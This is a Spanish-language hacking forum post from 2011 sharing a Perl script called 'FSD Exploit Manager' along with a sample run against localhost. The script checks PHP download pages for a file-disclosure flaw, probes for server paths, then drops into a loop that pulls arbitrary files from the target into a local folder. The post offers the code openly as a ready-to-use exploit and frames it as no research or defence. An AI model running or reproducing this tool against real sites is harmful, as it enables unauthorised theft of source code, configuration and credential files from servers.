Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Perl] FSD Exploit Manager

  • 0 Respuestas
  • 979 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Julio 03, 2011, 10:03:29 pm »
Un simple exploit que nos ayuda a explotar la vulnerabilidad Full Source Discloure de una forma
muy relajante , lo bueno de este programa es que guarda todo lo descargado en una carpeta creada
por el programa mismo.
Ademas detecta automaticamente Full Path Discloure para conocer las rutas necesarias para descargar
archivos.

Código: Perl
  1. #!usr/bin/perl
  2. #FSD Exploit Manager (C) Doddy Hackman 2011
  3.  
  4. use LWP::UserAgent;
  5. use URI::Split qw(uri_split);
  6. use File::Basename;
  7.  
  8. my $nave = LWP::UserAgent->new;
  9. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  10. $nave->timeout(5);
  11.  
  12. $SIG{INT} = \&adios;
  13.  
  14. head();
  15. if($ARGV[0]) {
  16. ver($ARGV[0]);
  17. } else {
  18. sintax();
  19. }
  20. copyright();
  21.  
  22. sub ver {
  23.  
  24. my $page = shift;
  25. print "\n[+] Target : ".$page."\n\n";
  26.  
  27. my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
  28.  
  29. if ($path=~/\/(.*)$/) {
  30. my $me = $1;
  31. $code1 = toma($page.$me);
  32. if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
  33. print "[+] Full Source Discloure Detect\a\n";
  34. $code2 = toma($page."'");
  35. if ($code2=~/No such file or directory in <b>(.*)<\/b> on line/) {
  36. print "\n[+] Full Path Dislocure Detect : ".$1."\n";
  37. }
  38. installer();
  39. while(1) {
  40. print "\n\nurl>";
  41. $SIG{INT} = \&adios;
  42. chomp(my $url = <stdin>);
  43. if (download($page.$url,"fsdlogs/".basename($url))) {
  44. print "\n\n[+] File Downloaded\n";
  45. system("start fsdlogs/".basename($url));
  46. }
  47. }
  48. } else {
  49. print "[-] Web not vulnerable\n\n";
  50. }
  51. }
  52. }
  53.  
  54. sub adios {
  55. print "\n\n[+] Good Bye\n";
  56. copyright();
  57. }
  58.  
  59. sub head {
  60. print "\n\n-- == FSD Exploit Manager == --\n\n";
  61. }
  62.  
  63. sub copyright {
  64. print "\n\n-- == (C) Doddy Hackman 2011 == --\n\n";
  65. exit(1);
  66. }
  67.  
  68. sub sintax {
  69. print "\n[+] Sintax : $0 <page>\n";
  70. }
  71.  
  72. sub toma {
  73. return $nave->get($_[0])->content;
  74. }
  75.  
  76. sub download {
  77. if ($nave->mirror($_[0],$_[1])) {
  78. if (-f $_[1]) {
  79. return true;
  80. }}}
  81.  
  82. sub installer {
  83. unless (-d "fsdlogs/") {
  84. mkdir("fsdlogs/","777");
  85. }}
  86.  
  87. # ¿ The End ?
  88.  


Un ejemplo de uso

Código: [Seleccionar]
C:\Documents and Settings\Administrador\Escritorio\Todo\Warfactory II\proyectos\
FSD Exploit Manager>fsd.pl http://localhost/down.php?down=


-- == FSD Exploit Manager == --


[+] Target : http://localhost/down.php?down=

[+] Full Source Discloure Detect

[+] Full Path Dislocure Detect : C:\xampp\htdocs\down.php


url>c:/aca.txt


[+] File Downloaded


url>c:/aca.txt


[+] File Downloaded


[+] Good Bye


-- == (C) Doddy Hackman 2011 == --


« Última modificación: Julio 17, 2011, 03:41:27 am por Sthefano02 »

 

¿Te gustó el post? COMPARTILO!



Tutorial perl desde cero By: Black Poision & Painboy

Iniciado por ProcessKill

Respuestas: 2
Vistas: 3470
Último mensaje Septiembre 02, 2011, 09:43:36 pm
por blozzter
[Perl] Verificando si es root para correr un script

Iniciado por c1st

Respuestas: 1
Vistas: 1721
Último mensaje Octubre 07, 2012, 06:01:39 pm
por ANTRAX
DoSing IP 1.0 - [Creado por SkillmaX] + Source [PERL]

Iniciado por SkillmaX

Respuestas: 0
Vistas: 1558
Último mensaje Julio 04, 2010, 10:14:31 am
por SkillmaX
Funciones más utilizadas en la programación de un perl script

Iniciado por Dragora

Respuestas: 0
Vistas: 799
Último mensaje Enero 06, 2019, 01:01:06 am
por Dragora
[Uniscan] Scanner de vulnerabilidades WEB hecho en Perl

Iniciado por tar3kw0rm3d

Respuestas: 0
Vistas: 1814
Último mensaje Junio 02, 2013, 08:01:28 pm
por tar3kw0rm3d